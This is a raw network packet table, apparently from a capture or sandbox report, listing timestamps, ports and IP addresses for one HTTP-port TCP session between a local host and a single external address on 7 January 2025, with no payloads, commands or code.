Jan 7, 2025 10:08:22.894043922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894071102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894114971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894125938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894136906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894150019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894174099 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894177914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894190073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894201040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894212961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894221067 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894248962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894268036 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894298077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894308090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894318104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894329071 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894340992 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894361019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894391060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894402981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894413948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894438982 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894463062 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894496918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894506931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894550085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894798040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894809961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894819975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.894846916 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.894983053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895000935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895009995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895019054 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895040989 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895051003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895061016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895111084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895551920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895562887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895572901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895584106 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895595074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895612001 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895628929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895636082 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895662069 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895682096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895704985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895716906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895735979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895747900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895755053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895782948 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895824909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895837069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895849943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895860910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895863056 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895888090 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895910025 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895965099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.895966053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.895977020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896009922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896014929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.896022081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896033049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896056890 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.896119118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896130085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896141052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896151066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896166086 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.896203995 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.896522999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896533966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896553993 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896559954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896589994 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.896884918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896903038 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896914005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.896961927 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.897010088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897022009 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897033930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897046089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897069931 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.897103071 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.897145033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897157907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897167921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897178888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897190094 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.897195101 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.897211075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.914129972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.914143085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.914185047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.950761080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950784922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950795889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950845957 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.950845957 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.950942039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950961113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950974941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950984955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950997114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.950999022 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.951008081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.951031923 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.951061010 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.993123055 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.993141890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.993154049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.993187904 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.017843008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.017868996 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.017882109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.017909050 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.017934084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018094063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018106937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018119097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018130064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018161058 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018192053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018551111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018567085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018580914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018593073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018605947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018619061 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018635988 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018750906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018764019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018775940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018786907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018800974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018810987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018822908 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018846035 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.018860102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018878937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018893003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.018933058 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019190073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019202948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019212961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019232988 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019256115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019263029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019268036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019279003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019289017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019325972 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019340038 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019366980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019381046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019391060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019422054 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019486904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019498110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019507885 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019520044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019524097 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019546986 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019582987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019593954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019603968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019614935 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019617081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019644022 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019737959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019754887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019767046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019778013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019778967 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019788980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019798040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019799948 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019809008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019819021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019831896 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019848108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.019929886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019948006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.019985914 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020041943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020073891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020076990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020085096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020106077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020126104 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020663977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020674944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020693064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020705938 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020706892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020720005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020730019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020736933 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020742893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020768881 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020787954 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020802021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020812035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020823002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020849943 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020878077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020889997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020921946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020932913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.020939112 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.020947933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021012068 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.021022081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021033049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021043062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021081924 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.021115065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021132946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021141052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021151066 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.021209002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021210909 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.021220922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021311045 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.021581888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021593094 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021604061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021614075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.021630049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.021645069 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.022377014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022387981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022397995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022430897 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.022524118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022533894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022545099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022556067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022569895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.022584915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022602081 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.022608995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022619963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022619963 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.022732019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.022795916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022845984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022850037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.022892952 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.072869062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.072887897 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.072901964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.072937012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.072967052 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.079216957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.079370975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.079384089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.079426050 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.079525948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.079538107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.079550028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.079583883 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.079596996 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.105272055 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.105284929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.105344057 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.108717918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.108772993 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.117568016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.117578983 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.117588997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.117645025 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.142792940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.142807961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.142819881 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.142899990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.142946959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143116951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143126965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143137932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143150091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143160105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143166065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143174887 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143243074 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143455029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143619061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143652916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143702030 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143805981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143816948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143829107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143841028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143851995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143851995 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143863916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143876076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143883944 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143927097 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.143975019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143985987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.143997908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144040108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144490957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144500971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144511938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144522905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144531965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144532919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144546032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144556999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144565105 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144568920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144579887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144596100 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144596100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144608974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144619942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144628048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144629002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144635916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144639969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144644976 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144659996 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144687891 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144701958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144747019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.144747972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144759893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144778967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144788980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.144795895 CET	49884	80	192.168.2.4	185.215.113.16
